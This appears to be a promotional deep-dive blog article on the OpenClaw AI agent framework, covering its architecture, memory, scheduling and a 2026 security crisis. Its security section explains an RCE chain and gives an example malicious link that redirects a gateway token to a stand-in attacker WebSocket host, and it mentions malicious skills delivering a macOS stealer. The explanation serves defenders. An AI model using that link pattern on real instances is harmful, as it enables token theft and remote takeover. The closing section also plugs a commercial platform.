In November 2025, an Austrian developer named Peter Steinberger quietly pushed a project called Clawdbot to GitHub. Three months later, it had been renamed OpenClaw, amassed over 234,000 stars, and landed its creator a job at OpenAI — where Sam Altman publicly called him "a genius with a lot of amazing ideas."
Along the way, it weathered a devastating security crisis that exposed 30,000+ instances to remote takeover. Its founder handed the keys to a foundation and walked into the offices of the world's most prominent AI company.
This is the complete story of OpenClaw in 2026: the architecture that made it viral, the memory system that made it sticky, the heartbeat engine that made it unique, the security catastrophe that nearly killed it, and what happens next. Whether you're a developer, a security professional, or an AI enthusiast — this deep dive covers everything you need to know.
TL;DR — OpenClaw 2026 Timeline
Date | Event |
|---|---|
Nov 2025 | Peter Steinberger launches Clawdbot on GitHub |
Late Jan 2026 | Crosses 180,000 GitHub stars; 2M+ visitors in one week |
Jan 30, 2026 | Security patch v2026.1.29 released for CVE-2026-25253 (CVSS 8.8) |
Feb 2026 | ClawHavoc campaign: 341→800+ malicious skills discovered in ClawHub |
Feb 14–15, 2026 | Steinberger announces he's joining OpenAI; foundation transition revealed |
Feb 25, 2026 | OpenAI publishes "Builders Unscripted: Ep. 1 — Peter Steinberger" on YouTube |
Feb 27, 2026 | 234,621 GitHub stars; ClawHub grows to 10,700+ skills |
1. The OpenAI Bombshell: Steinberger Joins, Foundation Born
On February 15, 2026, Peter Steinberger — the Austrian developer behind the fastest-growing open-source project in GitHub history — dropped a blog post on steipete.me that sent shockwaves through the AI industry: he was joining OpenAI.
"I'm joining OpenAI to work on bringing agents to everyone," Steinberger wrote. "OpenClaw will move to a foundation and stay open and independent."
Within hours, Sam Altman posted a confirmation on X that racked up 46,600+ likes: "Peter Steinberger is joining OpenAI to drive the next generation of personal agents. He is a genius with a lot of amazing ideas about very useful things for people."
The announcement was covered by Reuters, TechCrunch, CNBC, Fortune, VentureBeat, and CloudWars — a media blitz usually reserved for billion-dollar funding rounds, not a single developer joining a company. But this wasn't a normal hire, and OpenClaw wasn't a normal project.
Who Is Peter Steinberger?
Before OpenClaw, Steinberger ran a company for 13 years. He's a builder by his own admission — "I'm a builder at heart," he has said — and his technical reputation in the Apple developer community preceded his AI work by over a decade. When he launched what was originally called Clawdbot in November 2025, it was a personal experiment: a single-process AI agent that could connect to WhatsApp, Telegram, Discord, and a dozen other messaging platforms simultaneously.
The project exploded. By late January 2026, OpenClaw (renamed after Anthropic applied trademark pressure on the original "Clawdbot" name, which went through an intermediate rename to "Moltbot" before settling on OpenClaw) had crossed 180,000 GitHub stars and was pulling 2 million+ visitors per week. The concept was deceptively simple: one process, all your messaging channels, persistent memory, and an agent that doesn't just respond — it initiates.
Why OpenAI?
Steinberger's blog post provided rare candor about the decision-making process. He spent time in San Francisco talking with "the major labs" before choosing OpenAI. The reasoning was philosophical as much as practical:
"What I want is to change the world, not build a large company, and teaming up with OpenAI is the fastest way to bring this to everyone."
He described his mission in characteristically plain terms: "My next mission is to build an agent that even my mum can use."
This wasn't an acqui-hire in the traditional sense — OpenAI didn't buy OpenClaw's code or IP. The project moves to an independent, open-source foundation with OpenAI as a sponsor. Steinberger's role at OpenAI is to "drive the next generation of personal agents," which strongly suggests OpenClaw's architecture influenced what OpenAI wants to build internally.
The Foundation Model
The transition to a foundation governance model is the most consequential decision for OpenClaw's existing 234,000+ stargazers. Steinberger explicitly committed to keeping the project "open and independent." OpenAI will continue to sponsor the project — providing funding, likely compute resources, and the implicit stamp of approval that comes with the association — but won't own the codebase.
This mirrors the playbook of other successful open-source foundations (Linux Foundation, Apache, CNCF), but it's unprecedented for a project this young. OpenClaw went from a one-person repo to a foundation-governed project in roughly three months. The speed is dizzying, and it creates real questions about governance, contributor onboarding, and long-term maintenance that we'll explore in Section 6.
Impact on Anthropic
Here's the elephant in the room that few outlets covered: OpenClaw was one of the largest drivers of API traffic to Anthropic's Claude models. The default configuration pointed at Claude, and the hundreds of thousands of developers experimenting with OpenClaw were, by extension, paying Anthropic for API calls.
Steinberger joining OpenAI doesn't automatically flip OpenClaw's defaults away from Claude — the framework is model-agnostic — but the symbolic weight is enormous. The creator of the tool that was minting Anthropic API revenue chose to join Anthropic's primary competitor. The foundation structure theoretically insulates OpenClaw from becoming an OpenAI-exclusive pipeline, but the gravity of having your founder inside OpenAI's walls will inevitably pull the ecosystem toward GPT models.
For Anthropic, this is a case study in platform risk. When your growth partially depends on a third-party open-source project, and that project's creator joins your competitor, the downstream effects are unpredictable. As of this writing, OpenClaw still works beautifully with Claude models, but the narrative has shifted.
Media Coverage and Industry Reaction
The breadth of media coverage tells you how significant this was perceived to be. Reuters — a wire service that typically covers wars, elections, and Fortune 500 earnings — wrote about it. TechCrunch, CNBC, Fortune, VentureBeat, and CloudWars all ran stories. OpenAI itself published a YouTube video titled "Builders Unscripted: Ep. 1 — Peter Steinberger" on February 25, 2026 — making Steinberger the inaugural episode of what appears to be a new content series highlighting builders joining the company.
On Hacker News and Reddit, the reaction was mixed. Many celebrated the foundation model as the right path for open source. Others worried that OpenAI's sponsorship would inevitably compromise OpenClaw's independence. An OpenClaw Discord maintainer captured the community's pragmatic ethos with a characteristically blunt observation about the project's target audience: "If you can't understand how to run a command line, this is far too dangerous of a project for you to use safely."
That quote would prove prophetic as the security crisis unfolded.
2. Architecture Deep Dive: How OpenClaw Actually Works
To understand why OpenClaw went viral — and why its security vulnerabilities were so severe — you need to understand the architecture. This section is technical, but we'll keep it accessible. If you're evaluating OpenClaw for production use, this is the section that matters most.
The Gateway: One Process to Rule Them All
At the heart of OpenClaw is a single long-lived Gateway process that owns all messaging surfaces. This is the fundamental architectural decision that distinguishes OpenClaw from every other AI agent framework: instead of building one bot for Telegram, another for Slack, and a third for Discord, you run one process that connects to all of them simultaneously.
The Gateway is a Node.js process (requires Node ≥22) that manages:
All inbound and outbound message channels
WebSocket connections from control-plane clients
WebSocket connections from nodes (macOS, iOS, Android, headless)
The Canvas web UI served at
/__openclaw__/canvas/and/__openclaw__/a2ui/Agent sessions, context management, and tool execution
Supported Channels
OpenClaw's channel coverage is extraordinary and is the primary reason for its viral adoption. Each channel is implemented as a plugin:
Channel | Library / Protocol | Status |
|---|---|---|
Baileys | Core | |
Telegram | grammY | Core |
Discord | Native plugin | Core |
Slack | Native plugin | Core |
Signal | Native plugin | Core |
iMessage | Native plugin (macOS node) | Core |
Google Chat | Native plugin | Core |
Microsoft Teams | Native plugin | Core |
WebChat | Built-in | Core |
Mattermost | Community plugin | Community |
Matrix | Community plugin | Community |
Zalo | Community plugin | Community |
This is what made OpenClaw irresistible. A developer could install one tool and immediately have an AI agent accessible from WhatsApp, Telegram, Discord, and Slack — no separate deployments, no separate configurations, no separate billing. The "it just works everywhere" experience is the single biggest driver of adoption.
The WebSocket Protocol
Control-plane clients (the web UI, CLI tools, extensions) and nodes (macOS, iOS, Android devices) connect to the Gateway via WebSocket on the default port 18789. The wire protocol uses WebSocket text frames with JSON payloads — essentially JSON-RPC over WebSocket.
The connection lifecycle works as follows:
Step | Description |
|---|---|
1. TCP Connect | Client opens WebSocket to |
2. Connect Handshake | First frame MUST be a "connect" message with role (e.g., |
3. Authentication | If |
4. Session | JSON-RPC messages flow bidirectionally; Gateway routes to appropriate agent session |
This architecture has a critical security implication that we'll explore in Section 5: the WebSocket endpoint, by default, has no origin validation. Any webpage loaded in the user's browser could theoretically open a WebSocket connection to the local Gateway. This design choice — prioritizing ease of setup over security — became the foundation of the CVE-2026-25253 exploit chain.
The Agent Loop
When a message arrives from any channel, it enters the agent loop — a serialized pipeline that runs per session key (called a "session lane") with an optional global lane for cross-session operations. The loop follows this sequence:
Intake: The message arrives from a channel plugin, is normalized into an internal format, and routed to the correct session lane.
Context Assembly: The system prompt is built from multiple sources: the base prompt, skills prompt (from installed skills), bootstrap context, and per-run overrides. Workspace files (SOUL.md, AGENTS.md, USER.md, etc.) are injected into the context window.
Model Inference: The assembled context is sent to the configured LLM provider. OpenClaw is model-agnostic — it works with Claude, GPT, Gemini, Mistral, local models via Ollama, and others.
Tool Execution: If the model requests tool calls, the runtime executes them. Tools come from three sources: built-in tools, installed skills, and workspace-specific tools.
Streaming Replies: Responses stream back to the originating channel (and any connected control-plane clients) in real time.
Persistence: The conversation, tool results, and any memory updates are persisted to the workspace.
Pi Framework and pi-agent-core
Under the hood, the agent loop is powered by pi-agent-core, OpenClaw's internal runtime. The function runEmbeddedPiAgent is the entry point — it takes the assembled context, model configuration, and tool definitions, then manages the inference-and-tool-execution cycle until the model produces a final response.
The Pi framework handles several critical concerns:
Session serialization: Only one agent turn runs per session at a time, preventing race conditions when messages arrive faster than the model can respond.
Skill injection: Skills are loaded and injected into both the environment (making their tools available) and the prompt (giving the model instructions on how to use them).
Context management: As conversations grow, the framework manages compaction — summarizing older context to stay within the model's context window while preserving critical information.
Error recovery: If a tool call fails or the model produces malformed output, the framework retries with error context.
Workspace Files: The Agent's Brain
One of OpenClaw's most distinctive features is its use of plain Markdown files as the agent's configuration and personality layer. These files live in the workspace directory and are injected into the agent's context on every run:
File | Purpose | Required? |
|---|---|---|
| Operating instructions, rules, priorities — the "how to behave" file | Recommended |
| Persona, tone, and boundaries | Recommended |
| Who the user is and how to address them | Optional |
| Agent's name, vibe, emoji | Optional |
| Notes about local tools and conventions (does NOT control tool availability) | Optional |
| Proactive task checklist for heartbeat runs | Optional |
| Startup checklist on gateway restart | Optional |
| One-time first-run ritual (deleted after completion) | Optional |
This approach is inspired by how developers use README.md and .github/ directories — familiar, version-controllable, and human-readable. Instead of complex YAML configuration files or database-driven settings, your agent's entire personality and operating instructions live in files you can edit with any text editor and commit to Git.
The elegance of this design is that it makes agent behavior transparent. You can read the files and know exactly what the agent will do. You can diff changes. You can code-review personality updates. This is a radically different approach from black-box agent platforms where behavior is configured through web dashboards and stored in opaque databases.
Skills and ClawHub
Skills are OpenClaw's plugin system — reusable packages that add tools, prompts, and behaviors to the agent. They can be installed from ClawHub (the public registry), from Git repositories, or created locally in the workspace's skills/ directory.
The ClawHub registry has grown explosively, from 2,857 skills in late January 2026 to over 10,700 skills by late February. Skills range from simple utilities (web search, file management) to complex integrations (CRM connections, deployment pipelines, monitoring dashboards).
However, as we'll explore in Section 5, this rapid growth came with severe security consequences. The ClawHub marketplace had minimal vetting processes, and by February 2026, researchers discovered that approximately 20% of all listed skills were malicious.
3. Memory System Deep Dive: How OpenClaw Remembers
Memory is the feature that separates a useful chatbot from a genuine personal agent. If your AI assistant forgets everything the moment the conversation ends, it's a tool. If it remembers your preferences, your ongoing projects, your communication style, and the context from three weeks ago — it's an assistant. OpenClaw's memory system is one of its most thoughtfully designed components, and understanding it explains why users become so attached to the platform.
Plain Markdown as Source of Truth
In a world where every SaaS product stores your data in proprietary databases behind API walls, OpenClaw made a radical choice: memory is just Markdown files on your filesystem.
There are no databases. No vector stores you can't inspect. No opaque embedding formats. Your agent's entire memory is stored in files you can open, read, edit, and back up with cp. This is not just a philosophical stance — it has practical implications for portability, debugging, and trust.
The Two-Layer Memory System
OpenClaw's memory operates on two layers that work together:
Layer | File Pattern | Purpose | Lifecycle |
|---|---|---|---|
Daily Logs |
| Granular, timestamped record of each day's interactions, decisions, and observations | Created daily, accumulates indefinitely |
Curated Memory |
| Distilled long-term knowledge: user preferences, project context, key facts | Actively maintained, updated by agent (main session only) |
Daily logs (memory/YYYY-MM-DD.md) capture the raw stream of what happened each day. The agent writes entries as events occur — tasks completed, decisions made, information learned, errors encountered. Think of these as the agent's diary.
Curated memory (MEMORY.md) is the distilled, organized version — the agent's long-term knowledge base. It contains user preferences ("Nishant prefers American English"), project context ("The blog uses Next.js on Vercel"), ongoing task states, and key facts that should persist across all sessions. Only the main session writes to MEMORY.md, preventing conflicts from parallel sessions.
Memory Tools: Search and Retrieval
The agent has two primary tools for accessing memory:
memory_search (Semantic Recall): Uses vector embeddings to find relevant memories based on meaning, not just keywords. If the agent needs to recall "what project was the user working on last week," it runs a semantic search across all memory files and retrieves the most relevant passages. This is powered by the vector search system described below.
memory_get (Targeted Read): Directly reads a specific memory file when the agent knows exactly what it needs. For example, reading today's log (memory/2026-02-27.md) or the main MEMORY.md for long-term context.
The combination is powerful: semantic search handles the "I vaguely remember something about..." cases, while targeted reads handle the "What did we do yesterday?" cases.
Automatic Memory Flush Before Compaction
As conversations grow long, they eventually exceed the model's context window. OpenClaw handles this through compaction — summarizing older conversation turns to free up context space. But here's the critical innovation: before compacting, the system triggers an automatic memory flush.
This is a silent agentic turn — invisible to the user — where the agent reviews the conversation that's about to be compacted and writes any important information to durable memory files. The idea is simple but crucial: before we forget the conversation details, make sure the important parts are saved.
The flush is controlled by the agents.defaults.compaction.memoryFlush configuration. The soft threshold triggers when the estimated token count crosses contextWindow - reserveTokensFloor - softThresholdTokens. Only one flush occurs per compaction cycle, preventing runaway memory writes.
This solves one of the hardest problems in agent memory: the "lost context" problem. In most chatbot systems, when the conversation exceeds the context window, information simply drops off the end. Users have to repeat themselves. OpenClaw's flush mechanism ensures that critical context survives compaction by writing it to persistent storage before the context window rolls over.
Vector Search: sqlite-vec and Provider Selection
Under the hood, semantic memory search is powered by a vector index built over MEMORY.md and all memory/*.md files. The system watches for file changes (debounced to avoid unnecessary reindexing) and rebuilds the index as memories evolve.
The vector store uses sqlite-vec for acceleration — a SQLite extension that enables efficient nearest-neighbor search directly within a SQLite database. This means no external vector database is needed; everything stays local, fast, and portable.
For generating embeddings, OpenClaw auto-selects a provider based on what's available in the environment. The priority chain is:
Local:
node-llama-cpp(fully offline, no API calls)OpenAI: OpenAI embeddings API
Gemini: Google Gemini embeddings
Voyage: Voyage AI embeddings
Mistral: Mistral AI embeddings
The auto-selection is a thoughtful design choice. If the user has a powerful local machine, embeddings are generated locally with zero API cost. If they're running on a lightweight server, the system falls back to cloud providers. No configuration needed — it just works.
QMD Backend (Experimental)
For users who want more sophisticated search capabilities, OpenClaw offers an experimental QMD backend. QMD (created by Tobi, available at github.com/tobi/qmd) is a local-first search system that combines three retrieval strategies:
BM25: Traditional keyword-based scoring (great for exact term matches)
Vector search: Semantic similarity (great for conceptual matches)
Reranking: A secondary model that reorders results for relevance
This "hybrid search" approach addresses a fundamental limitation of pure vector search: it can miss results that share exact keywords but have different semantic embeddings. BM25 catches those cases, and the reranker ensures the final results are properly prioritized.
QMD runs fully locally via Bun + node-llama-cpp and auto-downloads GGUF models from HuggingFace. To enable it, you set memory.backend = "qmd" in the configuration. It's experimental, but it represents the direction agent memory systems are heading: multi-strategy retrieval that combines the strengths of keyword, semantic, and neural approaches.
Comparison to Other Agent Memory Systems
Most competing agent frameworks handle memory in one of three ways: they don't (stateless per conversation), they use a proprietary database (opaque, non-portable), or they use a vector database (requires separate infrastructure). OpenClaw's approach — plain files + local vector index + optional hybrid search — sits in a unique sweet spot:
Approach | Portability | Inspectable | Infrastructure |
|---|---|---|---|
Stateless (no memory) | N/A | N/A | None |
Proprietary DB | Low | No | Cloud service |
External vector DB | Medium | Partially | Separate service |
OpenClaw (Markdown + sqlite-vec) | High | Yes | None (local) |
The tradeoff is scale. OpenClaw's memory system works beautifully for individual users and small teams but isn't designed for enterprise-scale knowledge management across thousands of agents. For that use case, you'd need a centralized solution — which is one area where managed platforms have an advantage.
4. Heartbeat & Proactive Agents: The Feature Nobody Else Has
Here's what makes OpenClaw fundamentally different from every other AI agent framework on the market: it doesn't just respond. It initiates.
Every other agent framework — LangChain, CrewAI, AutoGen, Claude Code, GitHub Copilot — operates on a request-response model. The user asks, the agent answers. The user stops asking, the agent stops working. The agent is reactive, never proactive.
OpenClaw broke this pattern with its Heartbeat system, and it's arguably the single most important architectural innovation in the project.
What Is HEARTBEAT.md?
HEARTBEAT.md is a Markdown file in the workspace that defines proactive tasks the agent should perform on a schedule — without any user prompt. When a heartbeat fires, the agent wakes up, reads HEARTBEAT.md, and autonomously performs the tasks defined there.
Here's what makes this powerful: the tasks are defined in natural language. You don't write cron scripts or configure webhook endpoints. You write instructions in plain English, and the agent follows them. For example:
# HEARTBEAT.md
## Morning Briefing
- Every day at 9am, check my calendar and summarize today's schedule
- Send the summary to my WhatsApp
## Price Monitor
- Every 4 hours, check if AAPL dropped more than 2% today
- If yes, send me a Telegram alert
## Content Check
- Every Monday at 10am, review the content calendar
- Draft social posts for any articles published last week
Schedule Types
The heartbeat system supports three scheduling modes:
Type | Syntax | Use Case |
|---|---|---|
at | One-shot at a specific time | Reminders, one-time checks |
every | Recurring interval (e.g., every 4 hours) | Monitoring, periodic checks |
cron | Standard cron expression | Complex scheduling, business-hours-only tasks |
Under the hood, cron-based wake-ups trigger heartbeat polls. The system supports two execution modes:
systemEvent (main session): The heartbeat runs in the main agent session, with full access to conversation history and memory. Best for tasks that need context about what the user has been working on.
agentTurn (isolated session): The heartbeat runs in a fresh, isolated session. Best for independent tasks that shouldn't be influenced by (or pollute) the main conversation context.
Real-World Use Cases
The heartbeat system enables workflows that simply aren't possible with reactive agents:
Morning Briefings: Wake up at 7 AM, check email, calendar, news, and weather. Compile a personalized summary. Send it to WhatsApp before the user starts their day. No prompt needed — the agent does this autonomously.
Monitoring and Alerting: Check server status every 30 minutes. Monitor competitor pricing daily. Watch for mentions of your brand on social media. Alert via Telegram, Slack, or WhatsApp when something needs attention.
Content Management: Every Monday, review the content calendar and draft social posts for the week. Every evening, check analytics and report on article performance. Weekly, identify trending topics and suggest new content ideas.
Personal Finance: Daily portfolio summary at market close. Alert if any holding drops more than a specified threshold. Weekly expense categorization from bank transaction data.
Team Coordination: Daily standup summary at 9 AM. Sprint progress update every Friday. Automatic follow-up on overdue tasks.
Why No Other Framework Does This
The absence of proactive scheduling in other agent frameworks isn't an oversight — it's an architectural consequence. To run proactive tasks, you need:
A persistent process: The agent must be running all the time, not spun up on demand. OpenClaw's Gateway is a long-lived process by design.
Persistent memory: The agent needs to remember what tasks are scheduled and what it did last time. OpenClaw's file-based memory provides this.
Multi-channel output: The agent needs to send notifications without the user being "in" a conversation. OpenClaw's multi-channel Gateway enables this.
A scheduling system: Cron or equivalent, integrated into the agent runtime.
Most agent frameworks are designed as libraries, not services. They run when called and stop when done. OpenClaw is designed as an always-on daemon — a persistent process that lives on your machine (or server) and acts on your behalf even when you're not actively using it.
This is the conceptual leap that made Steinberger's tagline resonate: "The claw is the law." The agent isn't waiting for you. It's working for you.
The heartbeat system is almost certainly what caught OpenAI's attention. Steinberger's stated mission at OpenAI — "build an agent that even my mum can use" — implies bringing this always-on, proactive agent paradigm to mainstream users, not just developers who can configure HEARTBEAT.md files and cron expressions.
5. The ClawHub Security Crisis: CVE-2026-25253 and the ClawHavoc Campaign
For every inspiring detail about OpenClaw's architecture, there's a corresponding security horror story. The project's explosive growth — from obscurity to 234,000 stars in three months — outpaced its security posture by a devastating margin. In January and February 2026, security researchers revealed vulnerabilities so severe that they called into question whether OpenClaw should be deployed at all without significant hardening.
This section isn't written to alarm — it's written to inform. If you're running OpenClaw, you need to understand exactly what happened and what's been fixed.
CVE-2026-25253: The One-Click RCE Chain
On February 18, 2026, security firm Conscia published a detailed writeup of CVE-2026-25253, a vulnerability they rated CVSS 8.8 (High). The exploit was elegant, devastating, and exploited a fundamental architectural weakness in OpenClaw's design.
The attack is a one-click Remote Code Execution (RCE) chain that works in three stages:
Stage 1: Token Exfiltration
The Control UI (OpenClaw's web interface) accepts a gatewayUrl query parameter. An attacker crafts a malicious link — something like https://openclaw-instance.local/__openclaw__/canvas/?gatewayUrl=wss://attacker.com — and sends it to the victim. When the victim clicks the link, the Control UI connects to the attacker's WebSocket server instead of the legitimate Gateway, leaking the authentication token (OPENCLAW_GATEWAY_TOKEN) in the handshake.
Stage 2: Cross-Site WebSocket Hijacking
With the token in hand, the attacker now exploits a critical flaw: the Gateway has no Origin validation on WebSocket connections. This means the attacker can open a WebSocket connection from any webpage directly to the victim's Gateway. If the victim's browser is on the same network as the Gateway (which is almost always the case for localhost deployments), the attacker can connect and authenticate with the stolen token.
Stage 3: Gateway Takeover
Once connected and authenticated, the attacker has full control of the Gateway. They can execute arbitrary commands via the agent's tool system, read files from the workspace (including credentials stored in plaintext), send messages on behalf of the user across all connected channels, and install malicious skills.
The exploit is devastating because it works even against localhost-bound instances. Many users assumed that binding the Gateway to 127.0.0.1 was sufficient protection — after all, the Gateway isn't exposed to the internet. But the attack pivots through the victim's browser, which is on localhost. The browser becomes the bridge between the internet and the local Gateway.
Why Localhost-Only Isn't a Defense
This is worth emphasizing because it's a common misconception in the developer community: binding a service to localhost does not protect it from browser-based attacks.
Your browser runs on localhost. When you visit a malicious webpage, JavaScript on that page can make requests to localhost:18789 (or any local port). Without proper CORS headers and Origin validation on WebSocket connections, any local service is reachable from any webpage you visit. The same-origin policy protects reading HTTP responses, but WebSocket connections don't have equivalent built-in protections.
OpenClaw's architecture compounded this by storing credentials in plaintext workspace files and having no WebSocket Origin validation. The combination meant that a single clicked link could give an attacker complete control over the user's AI agent, all connected messaging accounts, and any credentials stored in the workspace.
The ClawHavoc Campaign
While CVE-2026-25253 was a vulnerability in OpenClaw itself, the ClawHavoc campaign targeted the ClawHub skills registry — the marketplace where users install third-party skills.
Security researchers initially discovered 341 malicious skills in the ClawHub registry, representing approximately 12% of the total 2,857 skills listed at the time. Subsequent scans revealed the problem was far worse: over 800 malicious skills, comprising roughly 20% of the registry as it grew to over 10,700 total skills.
The malicious skills primarily delivered the Atomic macOS Stealer (AMOS), a well-known macOS malware family that harvests credentials, cryptocurrency wallets, browser data, and keychain contents. Given OpenClaw's popularity among Mac-using developers, the targeting was devastatingly precise.
The attack vector was simple: publish skills with appealing names and descriptions to ClawHub. When users install them, the skills execute malicious code with the full permissions of the OpenClaw Gateway process — which, on most setups, has access to the user's home directory, messaging credentials, API keys, and more.
30,000+ Exposed Instances
The scale of exposure was staggering. According to data from Censys, Bitsight, and Hunt.io, the number of internet-exposed OpenClaw instances grew from approximately 1,000 to over 21,000 between January 25 and January 31, 2026 alone. By the time of the security disclosures, the total exceeded 30,000 exposed instances.
Many of these instances were running without authentication — meaning anyone who could reach the WebSocket port could connect and take control. No exploit chain needed. No clever attacks. Just connect and own it.
Enterprise Shadow AI
Perhaps most concerning for corporate security teams: OpenClaw was showing up on enterprise networks. Bitdefender GravityZone detected OpenClaw on corporate endpoints, flagging it as a Shadow AI concern. Employees were installing it on work machines without IT approval, connecting it to company Slack instances, and feeding it proprietary data — all through an agent framework with known critical vulnerabilities.
Security firms including Cyera and Cato Networks specifically called out OpenClaw as a case study in the dangers of unmanaged AI agent deployment. Immersive Labs and Repello AI published testing frameworks for evaluating agent security, with OpenClaw as a primary reference.
The Patch and Remaining Concerns
The core vulnerability (CVE-2026-25253) was patched in v2026.1.29, released on January 30, 2026. Additional CVEs were also addressed:
CVE-2026-24763: Related vulnerability in the Gateway
CVE-2026-25157: Command injection vulnerability
However, the patch only addresses the specific exploit chain. The architectural risks that enabled it persist to varying degrees:
Risk | Status Post-Patch |
|---|---|
WebSocket Origin validation | Fixed in v2026.1.29 |
gatewayUrl parameter injection | Fixed in v2026.1.29 |
Credentials in plaintext files | Architectural — not yet addressed |
ClawHub skill vetting | Improving, but 20% malicious rate is concerning |
Default no-auth Gateway | Auth optional, not enforced |
The sources for this section — Conscia, Kaspersky, Jamf, Tenable, Cyera, Immersive Labs, Cato Networks, and Repello AI — represent a broad consensus in the security community: OpenClaw is a powerful tool that was deployed at scale before its security model was ready for it.
6. Where OpenClaw Goes From Here
As of February 27, 2026, OpenClaw sits at 234,621 GitHub stars with 45,141 forks, making it one of the most-starred repositories in GitHub history. The MIT-licensed project has survived a naming crisis (Clawdbot → Moltbot → OpenClaw), a security catastrophe, and its founder's departure for OpenAI. The question now is: what happens next?
Foundation Governance
The transition to foundation governance is the single most important factor in OpenClaw's survival. Open-source projects that depend on a single maintainer are fragile; projects with foundation governance — clear contributor processes, shared ownership, organizational backing — tend to outlast their creators.
Steinberger's commitment that OpenClaw will "stay open and independent" is promising, but the foundation is brand new. It needs to establish contributor guidelines, a security review process, a release cadence, and — most importantly — a governance model for ClawHub that prevents another 20%-malicious-skills situation.
OpenAI Sponsorship
OpenAI's continued sponsorship of the project creates an interesting dynamic. On one hand, it provides financial stability and legitimacy. On the other hand, it creates a perceived alignment that could discourage contributions from developers working with competing models.
The key question: will OpenClaw maintain its model-agnostic stance? The framework currently works with Claude, GPT, Gemini, Mistral, and local models. If OpenAI's sponsorship subtly pushes the project toward GPT-first development, it could fracture the community.
The Skills Ecosystem
The ClawHub registry's growth from 2,857 skills to over 10,700 in roughly a month is explosive — and the 20% malicious rate is unacceptable. The foundation's first priority must be implementing rigorous skill vetting: automated security scanning, code review requirements, publisher verification, and a rapid response process for reported malicious skills.
A healthy skills ecosystem is OpenClaw's moat. If developers can trust the registry, it becomes the npm/pip equivalent for AI agents — a critical part of the infrastructure. If they can't trust it, it becomes a liability.
Security Improvements
Beyond ClawHub vetting, OpenClaw needs fundamental security improvements:
Credential management: Move away from plaintext credential storage. At minimum, integrate with system keychains (macOS Keychain, Linux Secret Service).
Default authentication: Make Gateway authentication the default, not optional.
Sandboxed skill execution: Skills should run in isolated environments, not with full Gateway permissions.
Security auditing: Regular third-party security audits, published transparently.
Competition
OpenClaw doesn't exist in a vacuum. The AI agent space is intensely competitive in 2026:
Claude Code (Anthropic): A powerful CLI-based agent with deep coding capabilities, but limited to terminal interactions — no multi-channel messaging, no proactive heartbeat.
GitHub Copilot Agents: Deeply integrated into the GitHub ecosystem with agents that can open PRs and respond to issues, but scoped to development workflows.
Custom agent frameworks (LangChain, CrewAI, AutoGen): Flexible libraries for building agents, but they're frameworks — you build the agent, not install one. They lack OpenClaw's "install and run" simplicity.
OpenClaw's unique value proposition remains its combination of multi-channel messaging, persistent memory, proactive heartbeat, and an open skills ecosystem — all in a single installable package. No competitor offers all four.
The Bigger Picture: Managed vs. Self-Hosted Agents
The OpenClaw security crisis highlighted a fundamental tension in the AI agent space: self-hosted agents offer maximum control and privacy, but require users to handle security, updates, and infrastructure. Managed platforms trade some control for reduced operational burden.
This is where platforms like Serenities AI enter the picture. Serenities AI takes the core concepts that made OpenClaw popular — multi-channel agents, persistent memory, MCP protocol support — and delivers them as a managed service. Instead of configuring HEARTBEAT.md files and worrying about WebSocket security, you get the same capabilities through a platform that handles infrastructure, security patching, and credential management for you.
Platforms like Serenities AI offer a managed alternative with native MCP support — the same protocol OpenClaw uses for tool integration. For teams that want agent capabilities without the operational overhead and security risk of self-hosting, managed platforms are worth evaluating. They don't replace OpenClaw for developers who want full control — but for the "my mum" users Steinberger wants to reach at OpenAI, managed platforms are the realistic path.
The market likely isn't winner-take-all. Self-hosted (OpenClaw) and managed (Serenities AI and others) will coexist, serving different segments with different risk tolerances and technical capabilities.
Frequently Asked Questions
Is OpenClaw still safe to use after the security vulnerabilities?
The core vulnerability (CVE-2026-25253) was patched in v2026.1.29, released January 30, 2026. If you're running this version or later, the specific one-click RCE chain is fixed. However, you should also enable Gateway authentication (OPENCLAW_GATEWAY_TOKEN), carefully vet any skills you install from ClawHub, and avoid exposing the Gateway port to the internet. The architectural risk of plaintext credential storage remains, so treat your workspace directory as sensitive.
Did OpenAI acquire OpenClaw?
No. OpenAI hired Peter Steinberger, OpenClaw's creator, but did not acquire the project's code or IP. OpenClaw is transitioning to an independent, open-source foundation. OpenAI will sponsor the project, but the codebase remains MIT-licensed and community-governed. Steinberger joined OpenAI to "drive the next generation of personal agents," suggesting OpenClaw's concepts influenced his work there, but the project itself stays independent.
What models does OpenClaw support?
OpenClaw is model-agnostic. It supports Claude (Anthropic), GPT (OpenAI), Gemini (Google), Mistral, and local models via Ollama and other providers. You configure the model in your settings, and the agent loop works identically regardless of the backend. The default has historically pointed toward Claude, though this may evolve under foundation governance with OpenAI sponsorship.
How does OpenClaw compare to Claude Code or GitHub Copilot?
Claude Code is a terminal-based coding agent — powerful for development tasks but limited to CLI interaction with no multi-channel messaging or proactive scheduling. GitHub Copilot Agents are scoped to the GitHub ecosystem (PRs, issues, code review). OpenClaw is broader: it connects to WhatsApp, Telegram, Discord, Slack, and more, with persistent memory and proactive heartbeat capabilities. They serve different use cases — coding-focused vs. general-purpose personal agent.
Can I self-host OpenClaw securely for enterprise use?
You can, but it requires hardening beyond the default configuration. At minimum: enable Gateway authentication, run behind a reverse proxy with TLS, audit all installed skills, restrict network access to the Gateway port, and monitor the workspace directory for unauthorized changes. The enterprise Shadow AI concern is real — security teams should have a policy for AI agent deployments rather than discovering them after a breach. Consider managed alternatives if your team can't commit to ongoing security maintenance.
What happens to OpenClaw if the foundation fails?
The project is MIT-licensed, which means anyone can fork it regardless of what happens to the foundation. The codebase, all 234,621 stars worth of community interest, and the skills ecosystem aren't locked behind a proprietary license. If the foundation struggles, the community can self-organize around a fork — similar to how io.js forked from Node.js before eventually merging back. The MIT license is OpenClaw's ultimate insurance policy.
Conclusion: The Most Important Open-Source AI Project of 2026
OpenClaw's story in 2026 reads like a compressed Silicon Valley epic: explosive growth, groundbreaking architecture, a devastating security crisis, and a dramatic founder departure to the industry's most prominent company. In three months, it went from a personal project to a foundation-governed open-source standard with 234,621 GitHub stars, 10,700+ skills, and the explicit backing of OpenAI.
The architecture — a single Gateway process connecting every messaging surface, persistent Markdown-based memory, and the proactive Heartbeat system — represents a genuine paradigm shift in how we think about AI agents. Not as chatbots you talk to, but as always-on assistants that work for you.
The security crisis was a painful but necessary wake-up call. A project this powerful, deployed at this scale, needs enterprise-grade security — and the community is now building it. The foundation model gives OpenClaw the governance structure to mature responsibly.
Whether you choose to self-host OpenClaw, use a managed platform like Serenities AI that delivers similar capabilities with less operational overhead, or wait for whatever Steinberger builds at OpenAI — the personal AI agent era is here. OpenClaw proved the demand. Now the industry is racing to meet it securely, reliably, and at scale.
